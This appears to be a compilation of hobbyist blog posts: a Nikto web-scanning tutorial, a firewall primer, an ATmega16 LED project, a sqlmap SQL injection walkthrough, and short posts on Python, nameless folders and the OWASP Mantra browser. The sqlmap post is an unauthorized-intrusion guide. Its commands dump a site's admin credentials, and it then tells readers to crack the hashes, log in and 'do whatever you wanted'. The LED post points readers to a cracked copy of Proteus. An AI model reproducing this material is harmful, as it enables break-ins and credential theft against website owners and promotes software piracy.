Website Scanning Through Nikito (in Backtrack 5)

Website Scanning Tutorial Through Nikto

When we talk about scanning website to find the vulnerability, we have many tools in Backtrack 5/ Kali Linux which serves the best and "Nikto" is one of them. These tools are efficiently used to measure the security level of the web applications.

About Nikto:

• Nikto is an open source.

• It can check a web server for over 6400 potentially dangerous files/CGIs.

• It checks for outdated versions of over 1000 servers, and version specific problems on over 270 servers.

• It checks the plug in and un-configured files.

• Fast & Effective.

• It finds out the default files and programs.

• It finds out the insecure files and programs.

Features:

• Full HTTP proxy support.

• Apache user name enumeration.

• Logging to Metasploit.

• Secure Socket Layer support (SSL).

• Sub-domain brute forcing (guessing).

• Easy to update.

• Save report on multiple format.

Requirements:

• Backtrack 5 / Kali Linux with Perl installed in it.

• OpenSSL

• Active State Perl

Tutorial:

The basic scan requires a host to scan, that means you need a website to scan. You can use a IP of the website or just its website name. Here I have taken the website as http://www.mytargetsite.com/ . You can take the website which you want to scan.

Open Nikto by following this:

1. To scan a website for the vulnerability we type:

$ perl nikito.pl -host http://www.mytargetsite.com/

or

$ perl nikito.pl -h http://www.mytargetsite.com/

2. For help:

$ perl nikto.pl -H http://www.mytargetsite.com/

3. If you want to check different port than use:

$ perl nikto.pl -h http://www.mytargetsite.com/ -p [port number]

4. If you want this test via proxy than you can use by this command:

$ perl nikto.pl -h http://www.mytargetsite.com/ -useproxy http://localhost:8080/

5. Now for updating nikto use:

$ perl nikto.pl -update 

6. To search vulnerability in multiple port within a range (e.g., we are searching port no. 80 to 100):

$ perl nikto.pl -h http://www.mytargetsite.com/ -port 80-100

7. To save the scan result in a text file for later use:

$ perl nikto.pl -h http://www.mytargetsite.com/ -output ./filename.txt

Note: Nikto scans port no. 80 by default. If you want to scan different port then choose another port (step 3).

For any query comment below or write us @ prashantsavior@gmail.com

Article by: Unpredictable

INTRODUCTION TO FIREWALL

A basic Introduction to Firewalls

Introduction to firewalls 

When you use internet in your college/school/ office, you may not be able to access some websites.

So do you know how they block those websites? They use firewalls for blocking the websites.

Firewall prevent the system from hackers attack. It also prevents you from various viruses. You can that it saves your Cyber life but just to some extent as there is nothing absolute.

So lets see what actually is this firewall!!!

*** The first question arises in our mind is What is Firewall? 

--->Firewall is working like a security guard standing outside the office. Usually, What the security guard do? He will allow those who has identity card and block those who has not the identity card.

Likewise, The firewall will block unauthorized access to the system. Firewall may be a software or hardware. It will work based on the set of rules defined by the administrator. Using Firewall administrator can block certain website from being accessed. All traffic from inside and outside of the network must pass through the firewall. Only authorized traffic will be allowed to pass (based on the set of rules).

***Second question which you must be thinking is what are the Types of Firewalls?

--->So here is a basic classification of types of firewall

 (i) Packet Filtering 

 (ii) Appliction level gateway

 (iii) Circuit level gate way 

(i) Packet Filtering (Network Layer):

A packet filtering router applies a set of rules to each incoming IP packet and then forwards or discards the packets. Router is configured such that it can filter incoming and outgoing packets. The packets will filtered based on the source and destination IP address. IP spoofing attack is possible in this packet filtering. IP spoofing can be achieved by changing the source IP address of packets. Stateful Inspection Firewalls. 

A stateful inspection packet filters tightens the rules of TCP traffic by creating a state table of out bound TCP connection. If the packet matches with existing connection based on the state table, it will be allowed. If it does not match, It will be evaluated according to the rule set for new connections. 

(ii) Applictaion Level Gateway:

Application level gateway is also known as proxy server. The user communicate with the gateway using application layer of TCP/IP stack. The gateway asks the user for the name of the remote host to be connected. When the user enters valid user ID, gateway will give access to the remote application. This will block the malicious activity and correct the application behavior. This will ensure the safety of company. More secure than packet filtering. Easy to log and audit all incoming traffic at the application level. Application-level filtering may include protection against spam and viruses as well, and be able to block undesirable Web sites based on content rather than just their IP address 

(iii) Circuit Level Gateway:

The circuit level gateway works at session layer of OSI model. Monitor TCP handshaking between packets to make sure a session is legitimate. Traffic is filtered based on the session rules. Circuit-level firewalls hide the network itself from the outside, which is useful for denying access to intruders. But they don't filter individual packets. This firewall is used when the administrator trusts internal users.

***So, Why Firewall?

--->Firewall block unauthorized users, prohibits vulnerable services from entering or leaving the network. Protection from IP spoofing and routing attacks. Protection against Remote login, Trojan backdoors, Session hijacking, cookie stealing,etc.

*** So by now you must be hunt with a question that does it have any limitations? If yes then What are the Limitation of Firewalls?

--->The firewall cannot protect against attacks that by pass the firewall. The firewall does not protect against internal threats. The firewall cannot protect against the transfer of virus infected programs or files. It would be impossible for the firewall to scan all incoming files, emails for viruses.

Author: Unpredictable

For query feel free to write us @ prashantsavior@gmail.com or comment below.

And don't forget to like us on Facebook

Simple LED Project Explained Using ATMEGA 16 (in Proteus)

This post is for the beginners who wants to put their first step towards Embedded system or Robotics. 
Lets start...
First set up your computer ready before starting...
1. Download and Install Proteus 8.0 full cracked 
    Download it from our software section. Click here to download
2. Download and Install AVR Studio and Win AVR 2010.
    Download it from our software section. Click here to download

Note: While working with Proteus 8.0 it may crash often after running for once. So for that save your work before simulating. To avoid this buy the professional version from the developer and support their work. Or else you have to restart it every time after simulating.

Atmega 16 is a micro-controller. To know more about it and its pin configuration Click here

After completing the above steps. Follow these steps:

Working on Proteus:-
Step 1: Open Proteus.
Step 2: Click on ISIS.

Step 3: Click in P to pick library.

Step 4: Select the component you want to connect.

Step 5: Connect the Pin as per the circuit diagram.

Now its programming time!!! Get Ready programmer!!!

Working with AVR Studio:
Step 6: Open AVR Studio 4.

Step 7: Follow create a new file and name it.

Step 8: Select the micro controller type as ATMEGA 16.

Step 9: Start writing program.

Step 10: After writing the program compile it by pressing F7.

Note: You should know any programming language to proceed forward. That will make your task easy.

Lets start from basic.

"avr/io.h" : Header file for input output of AVR
"avr/delay.h" or "util/delay.h" : Header file to add delay function.
DDRX : Used to assign the Slot A,B,C,D either to input or output. Where X = A / B / C /D.
PORTX : Used to assign the value for the pins of the slot when  it is set to output. Where X = A / B /C /D.
PINX : Used to get the value when the port is assign as input.
_delay_ms(i) : Used to provide delay in milliseconds. Where i is any integer. Example: _delay_ms(500) provides delay of 500 milliseconds. 

Q. How to assign the PORT as input or output?
--> Input is always assign as LOW and output is assign as HIGH.
       Example: To assign slot A and B as input we can write as PORTA=0x00 or PORTA=0b00000000 or PORTA=0. Similarly for B, we can write as PORTB=0x00 or PORTB=0b00000000 or PORTB=0.
       To assign slot C and D as output we can write as PORTC=0xff or PORTC=0b11111111 or PORTC=255. Similarly for D we can write as PORTD=0xff or PORTD=0b11111111 or PORTD=255.

***Where 0x is for hexadecimal, 0b is for binary and simply writing the integer is in decimal format.

Note: You can make any port as input or output. It totally depends on you.

Problem Statement 1:
Make a simple LED program to blink all LED simultaneously with a delay of 500 milliseconds.
--> Open AVR studio and set yourself ready to program.
                                
#include<avr/io.h>
#include<avr/delay.h>
int main()
{
DDRA=0xff;
PORTA=0x00;
while(1)
   {
   PORTA=0xff;
   _delay_ms(500);
   PORTA=0x00;
   _delay_ms(500);
  }
} 
Using the program in Proteus:
Step 11: Open Proteus and right click on the micro controller and click on edit.

 Step 12: Select the program file which you have made. Make sure the file extension is .hex.

Step 13: Click open and then click ok.
Step 14: Click on simulation button shown in the figure.

Proteus Crashes:

All you can do is close it and then again start it. Or better you buy the software if you can save enough buck from your pocket-money.



Try more program with different problem statement or wait for my next problem statement in my next post. Till then happy learning. And don't forget to comment if it was really helpful for you. 

Like us --> Facebook

For any query feel free to ask @ prashantsavior@gmail.com

Author: Unpredictable
Source provided by: Aakash Kumar Das

HACKING WEBSITE (SQLi) USING SQLMAP

Today I will introduce you a very simple tool which will ease your SQL injection procedure. With the help of this tool even a noob can also hack a website.

About Sqlmap:

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

To use this you need to download and install python. 

Installing and setting path for python:-

Step 1: Download python from www.python.org 

              (Download Python 2.7)

Step 2: Unzip that and install that in your computer.

Step 3: Go to control panel --> Go to System --> Click on Edit the system Environment variable.

Step 4: Then follow the steps given in the pic. Edit the environment variable as C:\python27;

Step 5: Click Ok and Restart your laptop.

Sqlmap:

Step 6: Download sqlmap from www.sqlmap.org.

Step 7: Unzip that and save that in your desired folder. (like I have saved that in C:)

Step 8: Open cmd by pressing windows + R. And then typing cmd and hit enter.

Step 9: Go to the folder where sqlmap is stored. 

C:> cd sqlmap 

Step 9: Run sqlmap and use it. Find a vulnerable url (how to find will discuss in other post, let here vulnerable url be www.vulnesite.php?id=23)

C:/sqlmap> python sqlmap.py -u www.vulnesite.php?id=23

Step 9: Then find the database of the website.

C:/sqlmap> python sqlmap.py -u "www.vulnesite.php?id=23" --dbs 

Step 10: Then find the tables and then column. (Let database found be admin)

C:/sqlmap> python sqlmap.py -u "www.vulnesite.php?id=23" --tables -D admin

(tables found be admin)

C:/sqlmap> python sqlmap.py -u "www.vulnesite.php?id=23" --columns -D admin -T user

Step 11: Get all the data from the tables.

C:/sqlmap> python sqlmap.py -u "www.vulnesite.php?id=23" --dump -D admin -T user

Step 12: You get the username and password. Now you can find the admin login page and type the username and the password (if its in MD5 hash then you need to decode that from various website). Now login and do whatever you wanted to do.

Author:Unpredictable

For any query feel free to contact us @ prashantsavior@gmail.com and don't forget to like us on Facebook.

Learn Python

Python is a widely used general-purpose, high-level programming language. Its design philosophy emphasizes codereadability, and its syntax allows programmers to express concepts in fewer lines of code than would be possible in languages such as C. The language provides constructs intended to enable clear programs on both a small and large scale.

Python supports multiple programming paradigms, including object-oriented, imperative and functional programming or proceduralstyles. It features a dynamic type system and automatic memory management and has a large and comprehensive standard library.

Like other dynamic languages, Python is often used as a scripting language, but is also used in a wide range of non-scripting contexts. Using third-party tools, such as Py2exe, or Pyinstaller, Python code can be packaged into standalone executable programs. Python interpreters are available for many operating systems.

CPython, the reference implementation of Python, is free and open source software and has a community-based development model, as do nearly all of its alternative implementations. CPython is managed by the non-profit Python Software Foundation.

Click on the link below to download a bunch of books.

Download

For more details please free to contact us @ prashantsavior@gmail.com

HOW TO MAKE NAMELESS FOLDER

Have you ever tried of making a nameless folder??? I guess if you ever tried with by just deleting the default folder name and hitting enter then again the default name comes. The same happens if you ever tried to make a folder named 'con', etc... Because there are certain keywords which has been assigned by the windows and is only for its internal use. Now the question comes how can we make nameless folder or folder named like con...

So for that simply follow the given steps...

Step 1: Make a folder in the drive where you want to make.

Step 2: Right click on the folder and then click on rename.

Step 3: Clear the default name by pressing backspace key.

Step 4: Switch on your Number lock (by pressing Fn + scroll ).

Step 5: Then keep on pressing alt with one finger and from other press k,i,i simultaneously (better say alt + 255 as k=2, i=5, when number lock is switched on).

Step 6: Then release all the keys and finally press Enter. Your nameless folder has been created.

alt + 255 actually prints a non-printable character which is not seen. Even if you try to press spacebar and then press enter, it won't work. I hope all of you have did this successfully.
Similarly, to make a folder named with con --> simply type con and then follow step 5 and 6.

Author: Unpredictable

If you have any query regarding this, feel free to contact us @ prashantsavior@gmail.com or simply comment on the below.

Hacker's Browser

                                                        OWASP MANTRA JANUS

OWASP, the different type of community which develops free application which can be trusted and used by all. They develop open source software for cyber security.
This time they came up with a browser which has all the capability and add on pre-installed which is required by every pentester and security geeks, it won't be odd to say that this browser is best for the hacker's as well as for cracker's.

You can download OWASP Mantra Janus from the link below

Click here to Download

Or

If you want to download it from the official site then go to the link below

Click here to proceed


About OWASP:
It was established as a not-for-profit charitable organization in the United States on April 21, 2004 to ensure the ongoing availability and support for our work at OWASP. OWASP is an international organization and the OWASP Foundation supports OWASP efforts around the world. OWASP is an open community dedicated to enabling organizations to conceive, develop, acquire, operate, and maintain applications that can be trusted. All of the OWASP tools, documents, forums, and chapters are free and open to anyone interested in improving application security. They advocate approaching application security as a people, process, and technology problem because the most effective approaches to application security include improvements in all of these areas.
OWASP is a new kind of organization. Our freedom from commercial pressures allows us to provide unbiased, practical, cost-effective information about application security. OWASP is not affiliated with any technology company, although we support the informed use of commercial security technology. Similar to many open-source software projects, OWASP produces many types of materials in a collaborative, open way. The OWASP Foundation is a not-for-profit entity that ensures the project's long-term success.

For more visit www.owasp.org